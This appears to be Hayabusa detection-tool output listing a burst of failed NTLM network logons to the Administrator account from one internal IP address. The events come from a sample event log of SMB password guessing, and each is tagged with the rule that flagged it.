2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
